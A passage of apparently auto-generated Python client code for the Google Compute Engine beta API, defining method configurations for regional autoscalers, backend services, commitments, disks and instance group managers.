List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionAutoscalers.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/autoscalers',
request_field='',
request_type_name=u'ComputeRegionAutoscalersListRequest',
response_type_name=u'RegionAutoscalerList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates an autoscaler in the specified project using the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeRegionAutoscalersPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.regionAutoscalers.patch',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'autoscaler', u'requestId'],
relative_path=u'projects/{project}/regions/{region}/autoscalers',
request_field=u'autoscalerResource',
request_type_name=u'ComputeRegionAutoscalersPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeRegionAutoscalersTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionAutoscalers.testIamPermissions',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/autoscalers/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeRegionAutoscalersTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates an autoscaler in the specified project using the data included in the request.
Args:
request: (ComputeRegionAutoscalersUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.regionAutoscalers.update',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'autoscaler', u'requestId'],
relative_path=u'projects/{project}/regions/{region}/autoscalers',
request_field=u'autoscalerResource',
request_type_name=u'ComputeRegionAutoscalersUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class RegionBackendServicesService(base_api.BaseApiService):
"""Service class for the regionBackendServices resource."""
_NAME = u'regionBackendServices'
def __init__(self, client):
super(ComputeBeta.RegionBackendServicesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified regional BackendService resource.
Args:
request: (ComputeRegionBackendServicesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.regionBackendServices.delete',
ordered_params=[u'project', u'region', u'backendService'],
path_params=[u'backendService', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/backendServices/{backendService}',
request_field='',
request_type_name=u'ComputeRegionBackendServicesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified regional BackendService resource.
Args:
request: (ComputeRegionBackendServicesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendService) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionBackendServices.get',
ordered_params=[u'project', u'region', u'backendService'],
path_params=[u'backendService', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/backendServices/{backendService}',
request_field='',
request_type_name=u'ComputeRegionBackendServicesGetRequest',
response_type_name=u'BackendService',
supports_download=False,
)
def GetHealth(self, request, global_params=None):
"""Gets the most recent health check results for this regional BackendService.
Args:
request: (ComputeRegionBackendServicesGetHealthRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendServiceGroupHealth) The response message.
"""
config = self.GetMethodConfig('GetHealth')
return self._RunMethod(
config, request, global_params=global_params)
GetHealth.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionBackendServices.getHealth',
ordered_params=[u'project', u'region', u'backendService'],
path_params=[u'backendService', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/backendServices/{backendService}/getHealth',
request_field=u'resourceGroupReference',
request_type_name=u'ComputeRegionBackendServicesGetHealthRequest',
response_type_name=u'BackendServiceGroupHealth',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a regional BackendService resource in the specified project using the data included in the request. There are several restrictions and guidelines to keep in mind when creating a regional backend service. Read Restrictions and Guidelines for more information.
Args:
request: (ComputeRegionBackendServicesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionBackendServices.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/backendServices',
request_field=u'backendService',
request_type_name=u'ComputeRegionBackendServicesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of regional BackendService resources available to the specified project in the given region.
Args:
request: (ComputeRegionBackendServicesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendServiceList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionBackendServices.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/backendServices',
request_field='',
request_type_name=u'ComputeRegionBackendServicesListRequest',
response_type_name=u'BackendServiceList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates the specified regional BackendService resource with the data included in the request. There are several restrictions and guidelines to keep in mind when updating a backend service. Read Restrictions and Guidelines for more information. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeRegionBackendServicesPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.regionBackendServices.patch',
ordered_params=[u'project', u'region', u'backendService'],
path_params=[u'backendService', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/backendServices/{backendService}',
request_field=u'backendServiceResource',
request_type_name=u'ComputeRegionBackendServicesPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeRegionBackendServicesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionBackendServices.testIamPermissions',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/backendServices/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeRegionBackendServicesTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates the specified regional BackendService resource with the data included in the request. There are several restrictions and guidelines to keep in mind when updating a backend service. Read Restrictions and Guidelines for more information.
Args:
request: (ComputeRegionBackendServicesUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.regionBackendServices.update',
ordered_params=[u'project', u'region', u'backendService'],
path_params=[u'backendService', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/backendServices/{backendService}',
request_field=u'backendServiceResource',
request_type_name=u'ComputeRegionBackendServicesUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class RegionCommitmentsService(base_api.BaseApiService):
"""Service class for the regionCommitments resource."""
_NAME = u'regionCommitments'
def __init__(self, client):
super(ComputeBeta.RegionCommitmentsService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of commitments.
Args:
request: (ComputeRegionCommitmentsAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(CommitmentAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionCommitments.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/commitments',
request_field='',
request_type_name=u'ComputeRegionCommitmentsAggregatedListRequest',
response_type_name=u'CommitmentAggregatedList',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified commitment resource. Get a list of available commitments by making a list() request.
Args:
request: (ComputeRegionCommitmentsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Commitment) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionCommitments.get',
ordered_params=[u'project', u'region', u'commitment'],
path_params=[u'commitment', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/commitments/{commitment}',
request_field='',
request_type_name=u'ComputeRegionCommitmentsGetRequest',
response_type_name=u'Commitment',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a commitment in the specified project using the data included in the request.
Args:
request: (ComputeRegionCommitmentsInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionCommitments.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/commitments',
request_field=u'commitment',
request_type_name=u'ComputeRegionCommitmentsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of commitments contained within the specified region.
Args:
request: (ComputeRegionCommitmentsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(CommitmentList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionCommitments.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/commitments',
request_field='',
request_type_name=u'ComputeRegionCommitmentsListRequest',
response_type_name=u'CommitmentList',
supports_download=False,
)
class RegionDiskTypesService(base_api.BaseApiService):
"""Service class for the regionDiskTypes resource."""
_NAME = u'regionDiskTypes'
def __init__(self, client):
super(ComputeBeta.RegionDiskTypesService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
"""Returns the specified regional disk type. Get a list of available disk types by making a list() request.
Args:
request: (ComputeRegionDiskTypesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DiskType) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionDiskTypes.get',
ordered_params=[u'project', u'region', u'diskType'],
path_params=[u'diskType', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/diskTypes/{diskType}',
request_field='',
request_type_name=u'ComputeRegionDiskTypesGetRequest',
response_type_name=u'DiskType',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of regional disk types available to the specified project.
Args:
request: (ComputeRegionDiskTypesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RegionDiskTypeList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionDiskTypes.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/diskTypes',
request_field='',
request_type_name=u'ComputeRegionDiskTypesListRequest',
response_type_name=u'RegionDiskTypeList',
supports_download=False,
)
class RegionDisksService(base_api.BaseApiService):
"""Service class for the regionDisks resource."""
_NAME = u'regionDisks'
def __init__(self, client):
super(ComputeBeta.RegionDisksService, self).__init__(client)
self._upload_configs = {
}
def CreateSnapshot(self, request, global_params=None):
"""Creates a snapshot of this regional disk.
Args:
request: (ComputeRegionDisksCreateSnapshotRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('CreateSnapshot')
return self._RunMethod(
config, request, global_params=global_params)
CreateSnapshot.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionDisks.createSnapshot',
ordered_params=[u'project', u'region', u'disk'],
path_params=[u'disk', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/disks/{disk}/createSnapshot',
request_field=u'snapshot',
request_type_name=u'ComputeRegionDisksCreateSnapshotRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified regional persistent disk. Deleting a regional disk removes all the replicas of its data permanently and is irreversible. However, deleting a disk does not delete any snapshots previously made from the disk. You must separately delete snapshots.
Args:
request: (ComputeRegionDisksDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.regionDisks.delete',
ordered_params=[u'project', u'region', u'disk'],
path_params=[u'disk', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/disks/{disk}',
request_field='',
request_type_name=u'ComputeRegionDisksDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns a specified regional persistent disk.
Args:
request: (ComputeRegionDisksGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Disk) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionDisks.get',
ordered_params=[u'project', u'region', u'disk'],
path_params=[u'disk', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/disks/{disk}',
request_field='',
request_type_name=u'ComputeRegionDisksGetRequest',
response_type_name=u'Disk',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a persistent regional disk in the specified project using the data included in the request.
Args:
request: (ComputeRegionDisksInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionDisks.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'requestId', u'sourceImage'],
relative_path=u'projects/{project}/regions/{region}/disks',
request_field=u'disk',
request_type_name=u'ComputeRegionDisksInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of persistent disks contained within the specified region.
Args:
request: (ComputeRegionDisksListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(DiskList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionDisks.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/disks',
request_field='',
request_type_name=u'ComputeRegionDisksListRequest',
response_type_name=u'DiskList',
supports_download=False,
)
def Resize(self, request, global_params=None):
"""Resizes the specified regional persistent disk.
Args:
request: (ComputeRegionDisksResizeRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Resize')
return self._RunMethod(
config, request, global_params=global_params)
Resize.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionDisks.resize',
ordered_params=[u'project', u'region', u'disk'],
path_params=[u'disk', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/disks/{disk}/resize',
request_field=u'regionDisksResizeRequest',
request_type_name=u'ComputeRegionDisksResizeRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets the labels on the target regional disk.
Args:
request: (ComputeRegionDisksSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionDisks.setLabels',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/disks/{resource}/setLabels',
request_field=u'regionSetLabelsRequest',
request_type_name=u'ComputeRegionDisksSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeRegionDisksTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionDisks.testIamPermissions',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/disks/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeRegionDisksTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class RegionInstanceGroupManagersService(base_api.BaseApiService):
"""Service class for the regionInstanceGroupManagers resource."""
_NAME = u'regionInstanceGroupManagers'
def __init__(self, client):
super(ComputeBeta.RegionInstanceGroupManagersService, self).__init__(client)
self._upload_configs = {
}
def AbandonInstances(self, request, global_params=None):
"""Schedules a group action to remove the specified instances from the managed instance group. Abandoning an instance does not delete the instance, but it does remove the instance from any target pools that are applied by the managed instance group. This method reduces the targetSize of the managed instance group by the number of instances that you abandon. This operation is marked as DONE when the action is scheduled even if the instances have not yet been removed from the group. You must separately verify the status of the abandoning action with the listmanagedinstances method.
If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.
You can specify a maximum of 1000 instances with this method per request.
Args:
request: (ComputeRegionInstanceGroupManagersAbandonInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AbandonInstances')
return self._RunMethod(
config, request, global_params=global_params)
AbandonInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroupManagers.abandonInstances',
ordered_params=[u'project', u'region', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/abandonInstances',
request_field=u'regionInstanceGroupManagersAbandonInstancesRequest',
request_type_name=u'ComputeRegionInstanceGroupManagersAbandonInstancesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Delete(self, request, global_params=None):
    """Deletes the specified managed instance group and all of the instances in that group.

    Args:
      request: (ComputeRegionInstanceGroupManagersDeleteRequest) input message.
      global_params: (StandardQueryParameters, default: None) global arguments.

    Returns:
      (Operation) The response message.
    """
    # Resolve this method's wire configuration and dispatch the call.
    return self._RunMethod(
        self.GetMethodConfig('Delete'), request,
        global_params=global_params)

Delete.method_config = lambda: base_api.ApiMethodInfo(
    relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}',
    http_method=u'DELETE',
    method_id=u'compute.regionInstanceGroupManagers.delete',
    ordered_params=[u'project', u'region', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'region'],
    query_params=[u'requestId'],
    request_field='',
    request_type_name=u'ComputeRegionInstanceGroupManagersDeleteRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def DeleteInstances(self, request, global_params=None):
    """Schedules a group action to delete the specified instances in the managed instance group. The instances are also removed from any target pools of which they were a member. This method reduces the targetSize of the managed instance group by the number of instances that you delete. This operation is marked as DONE when the action is scheduled even if the instances are still being deleted. You must separately verify the status of the deleting action with the listmanagedinstances method.

    If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.

    You can specify a maximum of 1000 instances with this method per request.

    Args:
      request: (ComputeRegionInstanceGroupManagersDeleteInstancesRequest) input message.
      global_params: (StandardQueryParameters, default: None) global arguments.

    Returns:
      (Operation) The response message.
    """
    # Resolve this method's wire configuration and dispatch the call.
    return self._RunMethod(
        self.GetMethodConfig('DeleteInstances'), request,
        global_params=global_params)

DeleteInstances.method_config = lambda: base_api.ApiMethodInfo(
    relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/deleteInstances',
    http_method=u'POST',
    method_id=u'compute.regionInstanceGroupManagers.deleteInstances',
    ordered_params=[u'project', u'region', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'region'],
    query_params=[u'requestId'],
    request_field=u'regionInstanceGroupManagersDeleteInstancesRequest',
    request_type_name=u'ComputeRegionInstanceGroupManagersDeleteInstancesRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Get(self, request, global_params=None):
    """Returns all of the details about the specified managed instance group.

    Args:
      request: (ComputeRegionInstanceGroupManagersGetRequest) input message.
      global_params: (StandardQueryParameters, default: None) global arguments.

    Returns:
      (InstanceGroupManager) The response message.
    """
    # Resolve this method's wire configuration and dispatch the call.
    return self._RunMethod(
        self.GetMethodConfig('Get'), request,
        global_params=global_params)

Get.method_config = lambda: base_api.ApiMethodInfo(
    relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}',
    http_method=u'GET',
    method_id=u'compute.regionInstanceGroupManagers.get',
    ordered_params=[u'project', u'region', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'region'],
    query_params=[],
    request_field='',
    request_type_name=u'ComputeRegionInstanceGroupManagersGetRequest',
    response_type_name=u'InstanceGroupManager',
    supports_download=False,
)
def Insert(self, request, global_params=None):
    """Creates a managed instance group using the information that you specify in the request. After the group is created, it schedules an action to create instances in the group using the specified instance template. This operation is marked as DONE when the group is created even if the instances in the group have not yet been created. You must separately verify the status of the individual instances with the listmanagedinstances method.

    A regional managed instance group can contain up to 2000 instances.

    Args:
      request: (ComputeRegionInstanceGroupManagersInsertRequest) input message.
      global_params: (StandardQueryParameters, default: None) global arguments.

    Returns:
      (Operation) The response message.
    """
    # Resolve this method's wire configuration and dispatch the call.
    return self._RunMethod(
        self.GetMethodConfig('Insert'), request,
        global_params=global_params)

Insert.method_config = lambda: base_api.ApiMethodInfo(
    relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers',
    http_method=u'POST',
    method_id=u'compute.regionInstanceGroupManagers.insert',
    ordered_params=[u'project', u'region'],
    path_params=[u'project', u'region'],
    query_params=[u'requestId'],
    request_field=u'instanceGroupManager',
    request_type_name=u'ComputeRegionInstanceGroupManagersInsertRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def List(self, request, global_params=None):
    """Retrieves the list of managed instance groups that are contained within the specified region.

    Args:
      request: (ComputeRegionInstanceGroupManagersListRequest) input message.
      global_params: (StandardQueryParameters, default: None) global arguments.

    Returns:
      (RegionInstanceGroupManagerList) The response message.
    """
    # Resolve this method's wire configuration and dispatch the call.
    return self._RunMethod(
        self.GetMethodConfig('List'), request,
        global_params=global_params)

List.method_config = lambda: base_api.ApiMethodInfo(
    relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers',
    http_method=u'GET',
    method_id=u'compute.regionInstanceGroupManagers.list',
    ordered_params=[u'project', u'region'],
    path_params=[u'project', u'region'],
    query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
    request_field='',
    request_type_name=u'ComputeRegionInstanceGroupManagersListRequest',
    response_type_name=u'RegionInstanceGroupManagerList',
    supports_download=False,
)
def ListManagedInstances(self, request, global_params=None):
    """Lists the instances in the managed instance group and instances that are scheduled to be created. The list includes any current actions that the group has scheduled for its instances.

    Args:
      request: (ComputeRegionInstanceGroupManagersListManagedInstancesRequest) input message.
      global_params: (StandardQueryParameters, default: None) global arguments.

    Returns:
      (RegionInstanceGroupManagersListInstancesResponse) The response message.
    """
    # Resolve this method's wire configuration and dispatch the call.
    return self._RunMethod(
        self.GetMethodConfig('ListManagedInstances'), request,
        global_params=global_params)

# NOTE: u'order_by' (snake_case) comes from the generated discovery document
# and must stay as-is to match the wire protocol.
ListManagedInstances.method_config = lambda: base_api.ApiMethodInfo(
    relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/listManagedInstances',
    http_method=u'POST',
    method_id=u'compute.regionInstanceGroupManagers.listManagedInstances',
    ordered_params=[u'project', u'region', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'region'],
    query_params=[u'filter', u'maxResults', u'order_by', u'pageToken'],
    request_field='',
    request_type_name=u'ComputeRegionInstanceGroupManagersListManagedInstancesRequest',
    response_type_name=u'RegionInstanceGroupManagersListInstancesResponse',
    supports_download=False,
)
def Patch(self, request, global_params=None):
    """Updates a managed instance group using the information that you specify in the request. This operation is marked as DONE when the group is patched even if the instances in the group are still in the process of being patched. You must separately verify the status of the individual instances with the listmanagedinstances method. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.

    Args:
      request: (ComputeRegionInstanceGroupManagersPatchRequest) input message.
      global_params: (StandardQueryParameters, default: None) global arguments.

    Returns:
      (Operation) The response message.
    """
    # Resolve this method's wire configuration and dispatch the call.
    return self._RunMethod(
        self.GetMethodConfig('Patch'), request,
        global_params=global_params)

Patch.method_config = lambda: base_api.ApiMethodInfo(
    relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}',
    http_method=u'PATCH',
    method_id=u'compute.regionInstanceGroupManagers.patch',
    ordered_params=[u'project', u'region', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'region'],
    query_params=[u'requestId'],
    request_field=u'instanceGroupManagerResource',
    request_type_name=u'ComputeRegionInstanceGroupManagersPatchRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def RecreateInstances(self, request, global_params=None):
    """Schedules a group action to recreate the specified instances in the managed instance group. The instances are deleted and recreated using the current instance template for the managed instance group. This operation is marked as DONE when the action is scheduled even if the instances have not yet been recreated. You must separately verify the status of the recreating action with the listmanagedinstances method.

    If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.

    You can specify a maximum of 1000 instances with this method per request.

    Args:
      request: (ComputeRegionInstanceGroupManagersRecreateInstancesRequest) input message.
      global_params: (StandardQueryParameters, default: None) global arguments.

    Returns:
      (Operation) The response message.
    """
    # Resolve this method's wire configuration and dispatch the call.
    return self._RunMethod(
        self.GetMethodConfig('RecreateInstances'), request,
        global_params=global_params)

RecreateInstances.method_config = lambda: base_api.ApiMethodInfo(
    relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/recreateInstances',
    http_method=u'POST',
    method_id=u'compute.regionInstanceGroupManagers.recreateInstances',
    ordered_params=[u'project', u'region', u'instanceGroupManager'],
    path_params=[u'instanceGroupManager', u'project', u'region'],
    query_params=[u'requestId'],
